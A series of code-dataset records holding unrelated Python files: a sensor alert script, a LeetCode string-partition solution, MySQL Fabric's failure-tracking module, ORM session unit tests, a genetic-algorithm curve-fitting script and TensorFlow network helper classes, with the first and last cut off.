send_mail('yesh385@gmail.com','Warning!','Humidity of package compromised')\r\n speak.Speak(\"Humidity Compromised\")\r\n p3=1\r\n if(a7==1 and p4==0):\r\n send_mail('yesh385@gmail.com','Warning!','Flame Alert')\r\n speak.Speak(\"Flame Alert\")\r\n p4=1\r\n if(a5>18000 and p5==0):\r\n send_mail('yesh385@gmail.com','Warning!','Vibration Alert')\r\n speak.Speak(\"Vibration Alert\")\r\n p5=1\r\n Reaction_dist=a4*0.3\r\n Braking_dist=((a4/10)**2)*0.4\r\n dist=Reaction_dist+Braking_dist+100\r\n if(dist>=a4 and p6==0):\r\n send_mail('yesh385@gmail.com','Warning!','Slow Down')\r\n speak.Speak(\"Slow Down\")\r\n p6=1\r\n if(clf.predict([[a6,a3]])==2):\r\n h2=h2+1\r\n elif(clf.predict([[a6,a3]])==1):\r\n h1=h1+1\r\n elif(clf.predict([[a6,a3]])==0):\r\n h0=h0+1\r\n if(clf1.predict([[a6,a3]])==2):\r\n h2=h2+1\r\n elif(clf1.predict([[a6,a3]])==1):\r\n h1=h1+1\r\n elif(clf1.predict([[a6,a3]])==0):\r\n h0=h0+1\r\n if(clf2.predict([[a6,a3]])==2):\r\n h2=h2+1\r\n elif(clf2.predict([[a6,a3]])==1):\r\n h1=h1+1\r\n elif(clf2.predict([[a6,a3]])==0):\r\n h0=h0+1\r\n if(clf3.predict([[a6,a3]])==2):\r\n h2=h2+1\r\n elif(clf3.predict([[a6,a3]])==1):\r\n h1=h1+1\r\n elif(clf3.predict([[a6,a3]])==0):\r\n h0=h0+1\r\n if(clf4.predict([[a6,a3]])==2):\r\n h2=h2+1\r\n elif(clf4.predict([[a6,a3]])==1):\r\n h1=h1+1\r\n elif(clf4.predict([[a6,a3]])==0):\r\n h0=h0+1\r\n if(max(h0,h1,h2)==h1 and p1==0):\r\n send_mail('yesh385@gmail.com','Warning!\\n','Accident Warning')\r\n p1=1\r\n for e in range(5):\r\n speak.Speak(\"Accident Warning\")\r\n elif(max(h0,h1,h2)==h2 and p2==0):\r\n send_mail('yesh385@gmail.com','Warning!\\n','Accident Danger')\r\n p2=1\r\n for e in range(5):\r\n speak.Speak(\"Accident Danger\")\r\n \r\n \r\nif __name__ == '__main__':\r\n Thread(target = f1).start()\r\n Thread(target = f2).start()\r\n Thread(target = f3).start()","sub_path":"logiX.py","file_name":"logiX.py","file_ext":"py","file_size_in_byte":9269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"9876079","text":"\"\"\"\n763. Partition Labels (Medium)\n\nA string S of lowercase letters is given. 
We want to partition this string into as many parts as possible so that each letter appears in at most one part, and return a list of integers representing the size of these parts.\n\nExample 1:\nInput: S = \"ababcbacadefegdehijhklij\"\nOutput: [9,7,8]\nExplanation:\nThe partition is \"ababcbaca\", \"defegde\", \"hijhklij\".\nThis is a partition so that each letter appears in at most one part.\nA partition like \"ababcbacadefegde\", \"hijhklij\" is incorrect, because it splits S into less parts.\nNote:\n\nS will have length in range [1, 500].\nS will consist of lowercase letters ('a' to 'z') only.\n\"\"\"\n\n\nclass Solution(object):\n def partitionLabels(self, S):\n \"\"\"\n :type S: str\n :rtype: List[int]\n \"\"\"\n memo = [-1] * 26\n for i, c in enumerate(S):\n idx = ord(c) - ord(\"a\")\n memo[idx] = i\n st = 0\n n = len(S)\n result = [0]\n while st < n:\n c = S[st]\n end = memo[ord(c) - ord(\"a\")]\n end_max = end\n while True:\n for i in range(st + 1, end + 1):\n c2 = S[i]\n end2 = memo[ord(c2) - ord(\"a\")]\n end_max = max(end_max, end2)\n if end_max == end:\n result.append(end - sum(result) + 1)\n break\n st, end = end, end_max\n st = end + 1\n return result[1:]\n\n def solve2(self, S):\n \"\"\"\n :type S: str\n :rtype: List[int]\n \"\"\"\n memo = [-1] * 26\n for i, c in enumerate(S):\n idx = ord(c) - ord(\"a\")\n memo[idx] = i\n end = memo[ord(S[0]) - ord(\"a\")]\n n = len(S)\n result = [-1]\n # while st < n:\n for i in range(n):\n # case 1: < end\n c = S[i]\n end = max(end, memo[ord(c) - ord(\"a\")])\n if end == i:\n result.append(end)\n result = [result[i + 1] - result[i] for i in range(len(result) - 1)]\n return result\n\n\nif __name__ == \"__main__\":\n a = Solution()\n # print(a.partitionLabels(\"ababc\"))\n # print(a.partitionLabels(\"ababcbacadefegdehijhklij\"))\n print(a.solve2(\"ababcbacadefegdehijhklij\"))\n","sub_path":"python/leetcode/string/763_partition_labels.py","file_name":"763_partition_labels.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"593983635","text":"#\n# Copyright (c) 2013,2014, Oracle and/or its affiliates. All rights reserved.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; version 2 of the License.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n#\n\"\"\"This module provides the necessary interfaces for reporting errors and\nfailures.\n\"\"\"\nimport logging\nimport uuid as _uuid\n\nfrom mysql.fabric.utils import (\n    get_time,\n    get_time_delta,\n)\n\nfrom mysql.fabric import (\n    events as _events,\n    server as _server,\n    errors as _errors,\n    error_log as _error_log,\n    config as _config,\n)\n\nfrom mysql.fabric.command import (\n    ProcedureGroup,\n)\n\nfrom mysql.fabric.services.server import (\n    _retrieve_server\n)\n\n_LOGGER = logging.getLogger(__name__)\n\nREPORT_ERROR = _events.Event(\"REPORT_ERROR\")\nclass ReportError(ProcedureGroup):\n    \"\"\"Report a server error.\n\n    If there are many issues reported by different servers within a period of\n    time, the server is marked as faulty. Should the server be a primary, the\n    failover mechanism is triggered. Users who only want to set the server's\n    status to faulty after getting enough notifications from different clients\n    must set the update_only parameter to true. By default its value is false.\n    \"\"\"\n    group_name = \"threat\"\n    command_name = \"report_error\"\n\n    _MIN_NOTIFICATIONS = 1\n    _NOTIFICATIONS = _DEFAULT_NOTIFICATIONS = 300\n\n    _MIN_NOTIFICATION_CLIENTS = 1\n    _NOTIFICATION_CLIENTS = _DEFAULT_NOTIFICATION_CLIENTS = 50\n\n    _MIN_NOTIFICATION_INTERVAL = 1\n    _MAX_NOTIFICATION_INTERVAL = 3600\n    _NOTIFICATION_INTERVAL = _DEFAULT_NOTIFICATION_INTERVAL = 60\n\n    def execute(self, server_id, reporter=\"unknown\", error=\"unknown\",\n                update_only=False, synchronous=True):\n        \"\"\"Report a server issue.\n\n        :param server_id: Server's UUID or HOST:PORT.\n        :param reporter: Who has reported the issue, usually an IP address or a\n                         host name.\n        :param error: Error that has been reported.\n        :param update_only: Only update the state store and skip provisioning.\n        \"\"\"\n        procedures = _events.trigger(\n            REPORT_ERROR, self.get_lockable_objects(), server_id, reporter,\n            error, update_only\n        )\n        return self.wait_for_procedures(procedures, synchronous)\n\nREPORT_FAILURE = _events.Event(\"REPORT_FAILURE\")\nclass ReportFailure(ProcedureGroup):\n    \"\"\"Report with certainty that a server has failed or is unreachable.\n\n    Should the server be a primary, the failover mechanism is triggered.\n    Users who only want to set the server's status to faulty must set the\n    update_only parameter to True. 
By default its value is false.\n    \"\"\"\n    group_name = \"threat\"\n    command_name = \"report_failure\"\n\n    def execute(self, server_id, reporter=\"unknown\", error=\"unknown\",\n                update_only=False, synchronous=True):\n        \"\"\"Report a server issue.\n\n        :param server_id: Server's UUID or HOST:PORT.\n        :param reporter: Who has reported the issue, usually an IP address or a\n                         host name.\n        :param error: Error that has been reported.\n        :param update_only: Only update the state store and skip provisioning.\n        \"\"\"\n        procedures = _events.trigger(\n            REPORT_FAILURE, self.get_lockable_objects(), server_id, reporter,\n            error, update_only\n        )\n        return self.wait_for_procedures(procedures, synchronous)\n\n@_events.on_event(REPORT_ERROR)\ndef _report_error(server_id, reporter, error, update_only):\n    \"\"\"Report a server error.\n    \"\"\"\n    (now, server) = _append_error_log(server_id, reporter, error)\n\n    interval = get_time_delta(ReportError._NOTIFICATION_INTERVAL)\n    st = _error_log.ErrorLog.fetch(server, interval, now)\n\n    if st.is_unstable(ReportError._NOTIFICATIONS,\n                      ReportError._NOTIFICATION_CLIENTS):\n        group = _server.Group.fetch(server.group_id)\n        if group.can_set_server_faulty(server, now):\n            _set_status_faulty(server, update_only)\n\n@_events.on_event(REPORT_FAILURE)\ndef _report_failure(server_id, reporter, error, update_only):\n    \"\"\"Report a server failure.\n    \"\"\"\n    (_, server) = _append_error_log(server_id, reporter, error)\n    _set_status_faulty(server, update_only)\n\ndef _set_status_faulty(server, update_only):\n    \"\"\"Set server's status to faulty and trigger a failover if the server\n    is a master.\n\n    This function assumes that the SERVER_LOST event is executed before\n    the FAIL_OVER event.\n    \"\"\"\n    server.status = _server.MySQLServer.FAULTY\n\n    _events.trigger_within_procedure(\n        \"SERVER_LOST\", server.group_id, str(server.uuid)\n    )\n\n    if not update_only:\n        _server.ConnectionPool().purge_connections(server.uuid)\n        group = _server.Group.fetch(server.group_id)\n        if group.master == server.uuid:\n            _LOGGER.info(\"Master (%s) in group (%s) has \"\n                         \"been lost.\", server.uuid, group.group_id)\n            _events.trigger_within_procedure(\"FAIL_OVER\", group.group_id)\n\ndef _append_error_log(server_id, reporter, error):\n    \"\"\"Check whether the server exists and is not faulty and register\n    error log.\n    \"\"\"\n    server = _retrieve_server(server_id)\n    if server.status == _server.MySQLServer.FAULTY:\n        raise _errors.ServerError(\n            \"Server (%s) is already marked as faulty.\" % (server.uuid, )\n        )\n\n    _LOGGER.warning(\"Reported issue (%s) for server (%s).\", error, server.uuid)\n\n    now = get_time()\n    _error_log.ErrorLog.add(server, now, reporter, error)\n\n    return (now, server)\n\ndef configure(config):\n    \"\"\"Set configuration values.\n    \"\"\"\n    try:\n        notifications = int(config.get(\"failure_tracking\", \"notifications\"))\n        if notifications < ReportError._MIN_NOTIFICATIONS:\n            _LOGGER.warning(\n                \"Notifications cannot be lower than %s.\",\n                ReportError._MIN_NOTIFICATIONS\n            )\n            notifications = ReportError._MIN_NOTIFICATIONS\n        ReportError._NOTIFICATIONS = int(notifications)\n    except (_config.NoOptionError, _config.NoSectionError, ValueError):\n        pass\n\n    try:\n        notification_clients = \\\n            int(config.get(\"failure_tracking\", \"notification_clients\"))\n        if notification_clients < ReportError._MIN_NOTIFICATION_CLIENTS:\n            _LOGGER.warning(\n                \"Notification_clients cannot be lower than %s.\",\n                ReportError._MIN_NOTIFICATION_CLIENTS\n            )\n            notification_clients = ReportError._MIN_NOTIFICATION_CLIENTS\n        
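# write the clamped value back to the class attribute that _report_error reads\n        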
ReportError._NOTIFICATION_CLIENTS = int(notification_clients)\n except (_config.NoOptionError, _config.NoSectionError, ValueError):\n pass\n\n try:\n notification_interval = \\\n int(config.get(\"failure_tracking\", \"notification_interval\"))\n if notification_interval > _error_log.ErrorLog._PRUNE_TIME:\n _LOGGER.warning(\n \"Notification interval cannot be greater than prune \"\n \"interval %s\", _error_log.ErrorLog._PRUNE_TIME\n )\n notification_interval = _error_log.ErrorLog._PRUNE_TIME\n if notification_interval > ReportError._MAX_NOTIFICATION_INTERVAL:\n _LOGGER.warning(\n \"Notification interval cannot be greater than %s.\",\n ReportError._MAX_NOTIFICATION_INTERVAL\n )\n notification_interval = ReportError._MAX_NOTIFICATION_INTERVAL\n if notification_interval < ReportError._MIN_NOTIFICATION_INTERVAL:\n _LOGGER.warning(\n \"Notification interval cannot be lower than %s.\",\n ReportError._MIN_NOTIFICATION_INTERVAL\n )\n notification_interval = ReportError._MIN_NOTIFICATION_INTERVAL\n ReportError._NOTIFICATION_INTERVAL = int(notification_interval)\n except (_config.NoOptionError, _config.NoSectionError, ValueError):\n pass\n","sub_path":"mysql-utilities-1.6.0/mysql/fabric/services/failure_tracker.py","file_name":"failure_tracker.py","file_ext":"py","file_size_in_byte":8466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"305219903","text":"import unittest\nfrom pollen.pyport import error, session\nimport model\n\ncreate_stmts = [\n '''create sequence department_id_seq''',\n '''create table department (id integer not null, name varchar(200))''',\n '''create sequence employee_id_seq''',\n '''create table employee (id integer not null, first_name varchar(200),\n last_name varchar(200), department_id integer)''',\n '''create sequence pet_id_seq''',\n '''create table pet (id integer not null, name varchar(200), employee_id integer not null)''',\n ]\n\ndestroy_stmts = [\n '''drop table pet''',\n '''drop sequence pet_id_seq''',\n '''drop table employee''',\n '''drop sequence employee_id_seq''',\n '''drop table department''',\n '''drop sequence department_id_seq''',\n ]\n\ndef make_connection():\n from pyPgSQL import PgSQL\n connect_params = {}\n return PgSQL.connect(**connect_params)\n\nclass TestsBase(unittest.TestCase):\n\n def buildDatabase(self):\n curs = self.conn.cursor()\n for stmt in create_stmts:\n curs.execute(stmt)\n self.conn.commit()\n\n def destroyDatabase(self):\n curs = self.conn.cursor()\n for stmt in destroy_stmts:\n curs.execute(stmt)\n self.conn.commit()\n\n def setUp(self):\n self.conn = make_connection()\n self.buildDatabase()\n self.sess = session.Session(self.conn)\n\n def tearDown(self):\n self.sess.close()\n del self.sess\n self.conn.rollback()\n self.destroyDatabase()\n self.conn.close()\n\nclass BasicTests(TestsBase):\n\n def test_00_save(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n\n def test_01_load(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n p = self.sess.load(model.Employee, (p.id,))\n\n def test_02_update(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n p = self.sess.load(model.Employee, (p.id,))\n p.first_name = 'Tim'\n p.last_name = 'Parkin'\n self.failIf(len(self.sess.updates) != 1)\n self.sess.flush()\n self.sess.flush()\n\n def test_03_delete(self):\n p = model.Employee(first_name='John', last_name='Smith')\n 
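# register the new object with the session; the following flush() writes it to the database\n        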
self.sess.save(p)\n self.sess.flush()\n p = self.sess.load(model.Employee, (p.id,))\n self.sess.remove(p)\n self.sess.flush()\n self.sess.flush()\n\nclass SessionJoinTests(TestsBase):\n\n def test_01_join(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n p = self.sess.load(model.Employee, (p.id,))\n self.sess.close()\n del self.sess\n p.first_name = 'Tim'\n p.last_name = 'Parkin'\n self.sess = session.Session(self.conn)\n self.sess.join(p)\n self.sess.flush()\n\n def test_02_join_new(self):\n '''Test that joining a new object fails'''\n p = model.Employee(first_name='John', last_name='Smith')\n try:\n self.sess.join(p)\n self.fail('join with new object should fail')\n except error.Error:\n pass\n \nclass FindTests(TestsBase):\n\n def test_01_find(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n ps = self.sess.find('from model.Employee')\n self.failIf(len(list(ps)) != 1)\n self.sess.save(model.Employee(first_name='Bill', last_name='Smith'))\n self.sess.flush()\n ps = self.sess.find('from model.Employee')\n self.failIf(len(list(ps)) != 2)\n ps = self.sess.find(\"from model.Employee as person where person.first_name='John'\")\n self.failIf(len(list(ps)) != 1)\n ps = self.sess.find(\"from model.Employee as person where person.last_name='Smith'\")\n self.failIf(len(list(ps)) != 2)\n ps = self.sess.find(\"from model.Employee as person where person.first_name='Wibble'\")\n self.failIf(len(list(ps)) != 0)\n\n def test_02(self):\n '''Test find using separate params'''\n self.sess.save(model.Employee(first_name='John', last_name='Smith'))\n self.sess.flush()\n l = list(self.sess.find(\"from model.Employee as e where e.first_name=%s\", 'John'))\n self.failIf(len(l) != 1)\n\nclass RelationTests(TestsBase):\n \n def setUp(self):\n TestsBase.setUp(self)\n d = model.Department(name='Engineering')\n d.employees.append(\n model.Employee(first_name='John', last_name='Smith'))\n d.employees.append(\n model.Employee(first_name='Bill', last_name='Smith'))\n self.sess.save(d)\n self.sess.flush()\n\n def test_01(self):\n '''Just to test that the overridden setUp is adding data correctly'''\n self.failIf(len(list(self.sess.find('from model.Department'))) != 1)\n self.failIf(len(list(self.sess.find('from model.Employee'))) != 2)\n\n def test_02(self):\n '''Test lazy fetching of relations'''\n d = self.sess.load(model.Department, (1))\n self.failIf(len(d.employees) != 2)\n \n def test_03(self):\n '''Test deletion of a collection item'''\n d = self.sess.load(model.Department, (1))\n del d.employees[0]\n self.sess.flush()\n d = self.sess.load(model.Department, (1))\n self.failIf(len(d.employees) != 1)\n \n def test_04(self):\n '''Test deletion of a collection item'''\n d = self.sess.load(model.Department, (1))\n del d.employees[:]\n self.sess.flush()\n d = self.sess.load(model.Department, (1))\n self.failIf(len(d.employees) != 0)\n\n def test_05(self):\n '''Test saving collections 2 deep'''\n d = model.Department(name='Marketing')\n d.employees.append(model.Employee(first_name='Kate', last_name='Watkins'))\n d.employees.append(model.Employee(first_name='Sam', last_name='Reece'))\n d.employees[0].pets.append(model.Pet(name='Fluffy'))\n d.employees[0].pets.append(model.Pet(name='Flipper'))\n self.sess.save(d)\n self.sess.flush()\n d = self.sess.load(model.Department, d.id)\n self.failIf(len(d.employees[0].pets) != 2)\n for employee in d.employees:\n if employee.first_name == 'Kate':\n 
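# only Kate was given pets in test_05, so she should hold exactly two\n                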
self.failIf(len(employee.pets) != 2)\n if employee.first_name == 'Sam':\n self.failIf(len(employee.pets) != 0)\n\n def test_06(self):\n '''Test changes to nested collection'''\n d = model.Department(name='Marketing')\n d.employees.append(model.Employee(first_name='Kate', last_name='Watkins'))\n d.employees[0].pets.append(model.Pet(name='Fluffy'))\n self.sess.save(d)\n self.sess.flush()\n d = self.sess.load(model.Department, d.id)\n d.employees[0].pets.append(model.Pet(name='Flipper'))\n self.sess.flush()\n d = self.sess.load(model.Department, d.id)\n self.failIf(len(d.employees[0].pets) != 2)\n d = self.sess.load(model.Department, d.id)\n del d.employees[0].pets[0]\n self.sess.flush()\n d = self.sess.load(model.Department, d.id)\n self.failIf(len(d.employees[0].pets) != 1)\n \n def test_07_assign_self(self):\n \"\"\"Test that assigning itself doesn't change anything\"\"\"\n d = self.sess.load(model.Department, 1)\n d.employees = d.employees\n self.sess.flush()\n d2 = self.sess.load(model.Department, 1)\n self.failIf([e.id for e in d.employees] != [e.id for e in d2.employees])\n \n def test_08_assign_none(self):\n self.fail('Not implemented')\n\n\nclass CacheTests(TestsBase):\n\n def test_01_save_and_load(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n identity = (p.id,)\n p1 = self.sess.load(model.Employee, identity)\n self.assertEquals(id(p ), id(p1))\n \n def test_01_load_multiple(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n identity = (p.id,)\n p1 = self.sess.load(model.Employee, identity)\n p2 = self.sess.load(model.Employee, identity)\n self.assertEquals(id(p1), id(p2))\n \n def test_01_find(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n p1 = list(self.sess.find('from model.Employee'))[0]\n p2 = list(self.sess.find('from model.Employee'))[0]\n self.assertEquals(id(p1), id(p2))\n \n\nunittest.main()\n","sub_path":"share/pollen/pyport/tests/test_session.py","file_name":"test_session.py","file_ext":"py","file_size_in_byte":8787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"58536115","text":"__author__ = 'msbcg452'\n\nimport numpy as np\nfrom scipy.integrate import ode\nfrom matplotlib import pyplot as plt\nfrom deap import base\nfrom deap import creator\nfrom deap import tools\nimport random\n\n\ndef evalOneMax(individual):\n a,b,c,d = individual\n if b<0:\n b=0.001\n individual[1]=0.001\n\n if c<0:\n c = 0\n individual[2]=0\n\n # print(b*t)\n # input()\n\n # vals = a * (tt + d) * np.log(b*(tt+d))+c*(tt+d)+e\n\n vals = a*np.log(b*dtt + c) + d\n return -sum((vals-dyy)**2),\n\n\ndef main():\n # random.seed(64)\n\n pop = toolbox.population(n=4000)\n CXPB, MUTPB, NGEN = 0.5, 0.2, 200\n\n print(\"Start of evolution\")\n\n # Evaluate the entire population\n fitnesses = list(map(toolbox.evaluate, pop))\n\n for ind, fit in zip(pop, fitnesses):\n\n ind.fitness.values = fit\n\n print(\" Evaluated %i individuals\" % len(pop))\n\n # Begin the evolution\n for g in range(NGEN):\n print(\"-- Generation %i --\" % g)\n\n # Select the next generation individuals\n offspring = toolbox.select(pop, len(pop))\n # Clone the selected individuals\n offspring = list(map(toolbox.clone, offspring))\n\n # Apply crossover and mutation on the offspring\n for child1, child2 in zip(offspring[::2], offspring[1::2]):\n if random.random() < CXPB:\n toolbox.mate(child1, child2)\n del 
child1.fitness.values\n del child2.fitness.values\n\n for mutant in offspring:\n if random.random() < MUTPB:\n toolbox.mutate(mutant)\n del mutant.fitness.values\n\n # Evaluate the individuals with an invalid fitness\n invalid_ind = [ind for ind in offspring if not ind.fitness.valid]\n fitnesses = map(toolbox.evaluate, invalid_ind)\n for ind, fit in zip(invalid_ind, fitnesses):\n ind.fitness.values = fit\n\n print(\" Evaluated %i individuals\" % len(invalid_ind))\n\n # The population is entirely replaced by the offspring\n pop[:] = offspring\n\n # Gather all the fitnesses in one list and print the stats\n fits = [ind.fitness.values[0] for ind in pop]\n\n length = len(pop)\n mean = sum(fits) / length\n sum2 = sum(x*x for x in fits)\n std = abs(sum2 / length - mean**2)**0.5\n\n print(\" Min %s\" % min(fits))\n print(\" Max %s\" % max(fits))\n print(\" Avg %s\" % mean)\n print(\" Std %s\" % std)\n\n print(\"-- End of (successful) evolution --\")\n\n best_ind = tools.selBest(pop, 1)[0]\n print(\"Best individual is %s, %s\" % (best_ind, best_ind.fitness.values))\n z = np.linspace(0.001, 1)\n\n # vz = best_ind[0] * (z + best_ind[3]) * np.log(best_ind[1]*(z + best_ind[3]))+best_ind[2]*(z + best_ind[3])+best_ind[4]\n a,b,c,d = best_ind\n vz = a*np.log(b*z + c) + d\n plt.plot(z,vz)\n\n plt.plot(dtt, dyy)\n plt.show()\n\n\ndef f(c, y):\n w = y[0]\n\n f2 = (2*c* (1 - 2 * c + w) * (-1 + w)) / (2*(c**2 -1) *(c - w))\n f5 = 5*c**4 * (1-2*c+w) * (-1+w)/ (2*(c**5-1)*(c-w))\n f1 = (1-2*c+w) * (-1+w)/ (2*(c-1)*(c-w))\n f3 = (3*c**2 * (1 - 2 * c + w) * (-1 + w)) / (2*(c**3 -1) *(c - w))\n # f0 = (w-2*c+1)*(w-1) /( (c-1)*(c-w))\n return f2\nt = np.zeros((1000))\ny = np.zeros((1000))\nw0 = .998\ny0 = [w0]\nt0 = .999\nt1 = .001\ndt = -0.001\nr = ode(f)\nr.set_initial_value(y0,t0)\nr.set_integrator(\"dop853\",nsteps=1000)\ni = 0\nwhile r.successful() and r.t > t1:\n r.integrate(r.t+dt)\n # print(\"%g %g\" % (r.t, r.y))\n t[i] = r.t\n y[i] = r.y\n i+=1\nw = np.where(y<0,0,y)\nplt.plot(t,w)\n\nplt.show()\n\nprint(y[::-1])\n\n\n\n","sub_path":"odepde.py","file_name":"odepde.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"559577136","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\n\nclass SimpleNeuralNetwork:\n\n\tdef __init__(self,input_dimensions, output_dimensions, no_hiddenLayers, neurons_hidden_layers_list):\n\t\tself.X = tf.placeholder(\"float\", [None,input_dimensions])\n\t\tself.Y = tf.placeholder(\"float\", [None,output_dimensions])\n\t\tself.dropout_placeholder = tf.placeholder(tf.float32)\n\t\tself.number_of_hidden_layers = no_hiddenLayers\n\t\tself.NumberOfNeurons_EachLayer = neurons_hidden_layers_list\n\t\tself.NumberOfNeurons_EachLayer.insert(0,input_dimensions)\n\t\tself.NumberOfNeurons_EachLayer.append(output_dimensions)\n\n\tdef inputPlaceholder(self):\n\t\treturn self.X\n\n\tdef outputPlaceholder(self):\n\t\treturn self.Y\n\n\tdef dropoutPlaceholder(self):\n\t\treturn self.dropout_placeholder\n\n\tdef createWeightsVector(self):\n\t\tself.WeightsKeys = [('w_'+str(i)) for i in range(self.number_of_hidden_layers+1)]\n\t\tself.WeightsKeys[-1] = 'w_out'\n\t\tself.weights = dict.fromkeys(self.WeightsKeys,)\n\t\tfor i in range(len(self.WeightsKeys)):\n\t\t\tself.weights[self.WeightsKeys[i]] = tf.Variable(tf.truncated_normal([self.NumberOfNeurons_EachLayer[i],self.NumberOfNeurons_EachLayer[i+1]], stddev = 0.1))\n\t\treturn self.weights\n\n\tdef createBiasVector(self):\n\t\tself.BiasKeys = 
[('b_'+str(i)) for i in range(self.number_of_hidden_layers+1)]\n\t\tself.BiasKeys[-1] = 'b_out'\n\t\tself.bias = dict.fromkeys(self.BiasKeys,)\n\t\tfor i in range(len(self.BiasKeys)):\n\t\t\tself.bias[self.BiasKeys[i]] = tf.Variable(tf.constant(0.1, shape = [self.NumberOfNeurons_EachLayer[i+1]]))\n\t\treturn self.bias\n\n\tdef createLayers(self):\n\t\tself.LayerKeys = [('layer_'+str(i)) for i in range(self.number_of_hidden_layers+1)]\n\t\tself.LayerKeys[-1] = 'layer_out'\n\t\tself.Layers = dict.fromkeys(self.LayerKeys,)\n\t\tfor i in range(len(self.LayerKeys)):\n\t\t\tif(i==0):\n\t\t\t\tself.Layers[self.LayerKeys[i]] = tf.add(tf.matmul(self.X,self.weights[self.WeightsKeys[i]]),self.bias[self.BiasKeys[i]])\n\t\t\telse:\n\t\t\t\tself.Layers[self.LayerKeys[i]] = tf.add(tf.matmul(self.Layers[self.LayerKeys[i-1]],self.weights[self.WeightsKeys[i]]),self.bias[self.BiasKeys[i]])\n\t\treturn self.Layers\n\n\tdef createDropoutLayer(self,discard_rate):\n\t\tself.dropout_layer = tf.nn.dropout(self.Layers[self.LayerKeys[-2]],discard_rate)\n\t\treturn self.dropout_layer\n\n \nclass TrainNetwork:\n\n\tdef __init__(self,learningRate,useDropout,num_iter):\n\t\tself.learningRate = learningRate\n\t\tself.useDropout = useDropout\n\t\tself.numberOfIterations = num_iter\n\t\tself.minibatch_accuracy_list = []\n\t\tself.output_accuracy_list = []\n\t\tself.minibatch_loss_list = []\n\t\tself.output_loss_list = []\n\n\t# def get_Session(self):\n\t# \tinit = tf.global_variables_initializer()\n\t# \twith tf.Session() as sess:\n\t# \t\tsess.run(init)\n\t# \t\treturn sess\n\n\tdef set_trainingData(self, X_train,y_train):\n\t\tself.X_train = X_train\n\t\tself.y_train = y_train\n\n\tdef set_dropout(self,dropout_val):\n\t\tself.dropout = dropout_val\n\n\tdef set_validationData(self, X_val,y_val):\n\t\tself.X_val = X_val\n\t\tself.y_val = y_val\n\n\tdef set_testData(self, X_test,y_test):\n\t\tself.X_test = X_test\n\t\tself.y_test = y_test\n\n\tdef set_placeholders(self, X_placeholder, y_placeholder, keep_prob_placeholder):\n\t\tself.X = X_placeholder\n\t\tself.Y = y_placeholder\n\t\tself.keep_prob = keep_prob_placeholder\n\n\tdef get_lossTensor(self, y_placeholder,output_layer):\n\t\tcross_entropy = tf.reduce_mean(tf.losses.softmax_cross_entropy(onehot_labels=y_placeholder, logits= output_layer))\n\t\treturn cross_entropy\n\n\tdef get_optimizerTensor(self, learningRate, lossTensor):\n\t\ttrain_step = tf.train.AdamOptimizer(learningRate).minimize(lossTensor)\n\t\treturn train_step\n\n\tdef get_accuracyTensor(self, y_placeholder,output_layer):\n\t\tcorrect_pred = tf.equal(tf.argmax(output_layer,1),tf.argmax(y_placeholder,1))\n\t\tself.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\t\treturn self.accuracy\n\n\tdef startTraining(self,session,lossTensor,optimizerTensor,accuracyTensor):\n\t\tfor i in range(self.numberOfIterations):\n\t\t\tsession.run(optimizerTensor,feed_dict={\n\t\t\t\tself.X : self.X_train,\n\t\t\t\tself.Y : self.y_train,\n\t\t\t\tself.keep_prob : self.dropout\n\t\t\t\t})\n\n\t\t\tminibatch_loss, minibatch_accuracy = session.run([optimizerTensor, accuracyTensor],feed_dict = {\n\t\t\t\tself.X: self.X_val, \n\t\t\t\tself.Y: self.y_val, \n\t\t\t\tself.keep_prob : 1.0\n\t\t\t\t})\n\t\t\tself.minibatch_accuracy_list.append(minibatch_accuracy)\n\t\t\tself.minibatch_loss_list.append(minibatch_loss)\n\n\t\t\toutput_loss, output_accuracy = session.run([optimizerTensor, accuracyTensor],feed_dict = {\n\t\t\t\tself.X: self.X_test, \n\t\t\t\tself.Y: self.y_test, \n\t\t\t\tself.keep_prob : 1.0 
